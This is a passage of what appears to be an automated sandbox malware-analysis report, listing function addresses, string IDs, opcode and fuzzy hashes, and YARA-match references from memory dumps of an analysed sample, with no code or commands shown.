                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                                                                                                                                                                                Function 0211AEF7 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                • Instruction ID: 9e32044718118e5129559657483d21b0fd9f1805461a75b01b7cad24c20181e3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4D1F47264C3555FD715CE24C8807AFBBE6AFC5318F09893DE8A987281D735EA04CB81
                                                                                                                                                                                                                                                                Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: /,-
                                                                                                                                                                                                                                                                • API String ID: 2994545307-1700940157
                                                                                                                                                                                                                                                                • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                                                                                                                                                                                                Function 02128A77 Relevance: 1.7, Strings: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /,-
                                                                                                                                                                                                                                                                • API String ID: 0-1700940157
                                                                                                                                                                                                                                                                • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                • Instruction ID: 1592c8b2317965d13667f8348fa5849d051017aa51cd461f0d9d7116ec24396d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34B17B706483644FD7248F248880A7BB7A2EF92318F1A993CF59557291D732EC2DCBA5
                                                                                                                                                                                                                                                                Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: VtA
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3724035812
                                                                                                                                                                                                                                                                • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                                                                                                                                                                                                Function 0043DB60 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                                                                                                                                                                                                                                                Function 004252DD Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 9YB
                                                                                                                                                                                                                                                                • API String ID: 0-659603884
                                                                                                                                                                                                                                                                • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                                                                                                                                                                                                                                                Function 00408330 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                                                • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                                                                                                                                                                                                                                                Function 020F8597 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                                                • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction ID: e6a28a3ef1c21dbc352784df7609f4f9768b11262e876d29e0f60656ab194d0a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB916A71E483524BC791CE2DC8843DAB7E5AB80754F18CA69EAD4DBBA1E734CC419BC1
                                                                                                                                                                                                                                                                Function 00430940 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                                                                                                                                                                                                                                                Function 02120BA7 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                • Instruction ID: bcf99bcee20d3577abac0d17f7dad753af3914abc572e18c3a226d4b6f60951b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE913C27799A940BC31C9E3C4C522A6BA834BEB230B2EC37DB5B1CB3E5D76548198355
                                                                                                                                                                                                                                                                Function 00405EE0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                                                • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                                                                                                                                                                                Function 020F6147 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                                                • API String ID: 0-3772416878
                                                                                                                                                                                                                                                                • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                • Instruction ID: e506d325b905dad4d69db37cacd9b201b7b7086fa17c4556d0d8dbacf051062a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EB15B701083819FD361CF18C98065BFBE4AFA9304F484E2DE5D997782D631EA18CB97
                                                                                                                                                                                                                                                                Function 02107806 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                                                • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                • Instruction ID: 5c279213e2becbbc9ddbdeb69ae3d5132fe9885dc525a056c8c22837ceda53a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD715A72A542518BD328CF28CC91BBBB6D6EBC1304F09C53ED491DB2D5DBB49906C781
                                                                                                                                                                                                                                                                Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                                                                                                                                                                                                Function 0211B3D7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction ID: 3ef6b53bf409fe926cc96efc671e44980e7f577e40d15e86c5113424e530d77a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E710232A4C3158BD724CE29C88032EB7E2ABD5718F1AC53DE4A59B391D335DE45C782
                                                                                                                                                                                                                                                                Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: klm
                                                                                                                                                                                                                                                                • API String ID: 0-3800403225
                                                                                                                                                                                                                                                                • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                                • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                                                                                                                                                                                                                Function 0210DAB8 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: klm
                                                                                                                                                                                                                                                                • API String ID: 0-3800403225
                                                                                                                                                                                                                                                                • Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                                • Instruction ID: 6b46143c41f910dd1bcd3a8d1c23466659094f44d08f2d726315dfe3c29bd2e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB5122B464C3508BD724DF64C49276BB7F2FFA6308F18896CE4D68B290E7358501CB1A
                                                                                                                                                                                                                                                                Function 004288CB Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: pF
                                                                                                                                                                                                                                                                • API String ID: 0-4112324664
                                                                                                                                                                                                                                                                • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                                • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                                                                                                                                                                                                                                                Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: ?^A
                                                                                                                                                                                                                                                                • API String ID: 2994545307-4120214115
                                                                                                                                                                                                                                                                • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                                • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                                                                                                                                                                                                                Function 004236E2 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 6B
                                                                                                                                                                                                                                                                • API String ID: 0-4127139157
                                                                                                                                                                                                                                                                • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                                                                                                                                                                                • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
